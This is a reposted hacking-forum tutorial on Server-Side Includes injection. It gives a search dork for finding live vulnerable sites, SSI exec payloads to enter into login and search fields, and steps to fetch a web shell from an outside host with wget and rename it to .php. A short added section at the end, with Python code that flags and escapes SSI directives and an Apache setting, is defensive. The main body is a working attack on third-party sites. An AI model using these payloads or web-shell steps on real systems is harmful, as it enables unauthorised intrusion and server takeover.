[SSI] Server-Side Includes Injection. [Tutorial]

Just reposting some good and notable threads from my previous (now dead) home forum; Hacksociety.

Credits: ๖ۣۜΗ α x O r ♥

Things you will need:
  1. Site vulnerable to SSI injection (I will be giving a few dorks and a few vulnerable sites to practice on)
  2. Common sense.

What is SSI?

SSI Injection (Server-side Include) is a server-side exploit technique that allows an attacker to send code into a web application, which will later be executed locally by the web server. SSI Injection exploits a web application's failure to sanitize user-supplied data before it is inserted into a server-side interpreted HTML file.

The Server-Side Includes attack allows the exploitation of a web application by injecting scripts in HTML pages or executing arbitrary code remotely. It can be exploited through manipulation of SSI in use in the application or by forcing its use through user input fields.

If an attacker submits a Server-side Include statement, he may have the ability to execute arbitrary operating system commands, or include a restricted file's contents the next time the page is served.

Source: Wikipedia/etc

Finding a vulnerable site

I will provide a few dorks for this type of injection.
Best dork I found is inurl:bin/Cklb/ but it gave about 863 results so not that usable.

Let's get to work, shall we?

Enter inurl:bin/Cklb/ in Google and go testing...

Testing a site

Once you have used that dork and opened a site, you must determine if the site is vulnerable to this type of injection.

Here are some commands you can use:
Credits: Stewie™

<!--#echo var="DATE_LOCAL" -->
Will display the Date

<!--#exec cmd="whoami"-->
Will show which user is running on the server

<!--#exec cmd="ls -a" --> (Linux)
Will display all files in the directory

<!-- #exec cmd="dir" --> (Windows)
Will display all files in the directory

Now take one of the commands and insert it in search boxes or login fields.
Mostly login fields are vulnerable, but there are some cases when search boxes are vulnerable.

NOTE: You must enter your command into both fields (if the login fields are vulnerable!)

And when you insert a command:
<!--#exec cmd="ls -a" -->

Now we see that our command successfully executed and that our site is vulnerable.

Spawning a shell

So we have our vulnerable site and we are ready to upload a shell.
First of all you will need a .TXT of your favourite shell (host it somewhere: free hosting, hacked site or anything you've got)

Now we must download it to our site like this:
<!--#exec cmd="wget http://website.com/dir/shell.txt" -->

So insert your site where your shell is hosted in the command and you are ready to go.

Now just paste it into the fields and press Login or Enter.

To see if your .TXT file downloaded, execute the command we used before:
<!--#exec cmd="ls -a" -->

If you see that it downloaded successfully, you must now rename it from .txt to .php!
You can use this command:

<!--#exec cmd="mv shell.txt shell.php" -->

Rename the files to whatever you need (of course, you will need to put your .TXT name first).

My command:

<!--#exec cmd="mv config1.txt config.php" -->

Now list the files again and try to find your file.
If you find it, just access it.

That would be the end of this tutorial.
I hope you learned something and do not rape sites with this
(Be smart and use them)

Further reading: https://owasp.org/www-community/attacks/..._Injection
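
The "What is SSI?" section traces the flaw to user-supplied data reaching a server-parsed page unsanitized. As an added defensive example (not part of the original post), this Python code flags SSI directives in submitted form fields, including URL-encoded and double-encoded ones, and HTML-encodes values before they are written into a page; the function names and the sample form are constructed for illustration.

```python
import html
import re
from urllib.parse import unquote_plus

# Opening of an SSI directive: "<!--", optional whitespace, "#", element name.
# Whitespace is tolerated so spaced variants are flagged too.
SSI_OPEN = re.compile(r"<!--\s*#\s*([a-z]+)", re.IGNORECASE)


def decode_layers(value, max_rounds=3):
    """URL-decode repeatedly (bounded) so double-encoded input is inspected too."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_ssi(value):
    """Return the SSI element names (echo, exec, include, ...) present in value."""
    return [m.group(1).lower() for m in SSI_OPEN.finditer(decode_layers(value))]


def neutralize(value):
    """HTML-encode the value so the server-side parser sees text, not a directive."""
    return html.escape(value, quote=True)


def audit_fields(fields):
    """Map each form field that carries an SSI directive to the elements found."""
    hits = {name: find_ssi(val) for name, val in fields.items()}
    return {name: found for name, found in hits.items() if found}


# Constructed sample submission (not captured traffic); directives are the ones quoted above.
SAMPLE_FORM = {
    "username": '<!--#exec cmd="whoami"-->',
    "password": "%3C%21--%23echo+var%3D%22DATE_LOCAL%22+--%3E",
    "search": "how do <!-- html comments --> work?",
}

if __name__ == "__main__":
    for field, found in audit_fields(SAMPLE_FORM).items():
        print(f"reject {field}: SSI element(s) {found}")
    print(neutralize(SAMPLE_FORM["username"]))
```

On Apache, `Options IncludesNOEXEC` additionally disables `#exec` in server-parsed files.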

Messages In This Thread
[SSI] Server-Side Includes Injection. [Tutorial] - by Insider - 03-27-2020, 02:22 AM
